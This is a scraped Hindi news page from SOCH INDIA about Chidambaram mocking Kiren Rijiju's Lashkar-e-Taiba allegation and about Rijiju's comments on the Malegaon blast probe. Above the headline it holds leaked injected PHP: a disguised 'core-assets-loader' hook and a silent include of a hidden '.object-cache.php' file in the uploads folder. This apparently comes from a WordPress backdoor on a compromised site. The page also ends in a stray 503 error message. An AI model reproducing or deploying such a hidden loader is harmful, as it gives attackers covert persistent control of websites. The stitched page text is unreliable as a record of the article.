add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); चिदंबरम बोले- हां, लश्कर के साथ नाश्ता किया, उन्हें डिनर पर बुलाया – SOCH INDIA
Menu

चिदंबरम बोले- हां, लश्कर के साथ नाश्ता किया, उन्हें डिनर पर बुलाया

केंद्रीय गृह राज्य मंत्री किरण रिजीजू के पी. चिदंबरम के नेतृत्व वाले तत्कालीन गृह मंत्रालय पर आतंकी संगठन लश्कर-ए-तैयबा के साथ चलने का आरोप लगाने पर पूर्व मंत्री ने तंज कसते हुए जवाब दिया है। पूर्व गृह मंत्री चिदंबरम ने कहा कि हां… हमने लश्कर के साथ ब्रेकफास्ट किया था और उन्हें डिनर के लिए भी बुलाया था। चिदंबरम ने किरन के बयान को गैरजिम्मेदार बताया। कांग्रेस ने इस आरोप का पुरजोर विरोध करते हुए मंत्री को हटाए जाने की मांग की है।

एक इंटरव्यू में गृह राज्य मंत्री रिजीजू ने इशरत जहां मामले से जुड़ी कई घटनाओं का जिक्र किया और कहा कि शुरुआत में लश्कर-ए-तैयबा ने दावा किया था कि वह शहीद है लेकिन सीबीआई के एक खास अधिकारी को जांच का प्रभारी बनाए जाने के दिन संगठन ने अपना बयान बदल दिया।

चिदंबरम बोले- हां, लश्कर के साथ नाश्ता किया, उन्हें डिनर पर बुलाया
पूर्व गृह मंत्री चिदंबरम ने कहा कि हां… हमने लश्कर के साथ ब्रेकफास्ट किया था और उन्हें डिनर के लिए भी बुलाया था। चिदंबरम ने किरन के बयान को गैरजिम्मेदार बताया…

मालेगांव विस्फोट की जांच कांग्रेस की नौटंकी

मालेगांव विस्फोट की जांच की लेकर भी गृह राज्यमंत्री किरण रिजिजू ने कांग्रेस पर निशाना साधा। उनका कहना है कि 2008 में हुए विस्फोट की जांच के नाम पर कांग्रेस नौटंकी कर रही थी। इसके पीछे सांप्रदायिक विभाजन की सोची-समझी रणनीति थी। रिजिजू इस मामले में साध्वी प्रज्ञा को राष्ट्रीय जांच एजेंसी (एनआइए) की ओर से मिली क्लीनचिट को लेकर पूछे गए सवाल का जवाब दे रहे थे।

राज्यमंत्री ने कहा, ‘सुप्रीम कोर्ट ने एनआइए को कहा है कि उसकी भूमिका सिर्फ मुकदमे को आगे बढ़ाना नहीं। इसे जनता के सामने सही तथ्यों को भी लाना चाहिए। एनआइए ने यही किया है। पहले चल रही जांच देश में सांप्रदायिक विभाजन की कांग्रेस की सोची-समझी चाल थी।’

उल्लेखनीय है कि अपने पहले के रुख के विपरीत 13 मई को एनआइए ने साध्वी प्रज्ञा ठाकुर और पांच अन्य पर लगे आरोप वापस ले लिए थे। इसके अलावा लेफ्टिनेंट कर्नल प्रसाद श्रीकांत पुरोहित समेत 10 लोगों पर मकोका के तहत लगाए गए आरोप भी वापस ले लिए गए।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.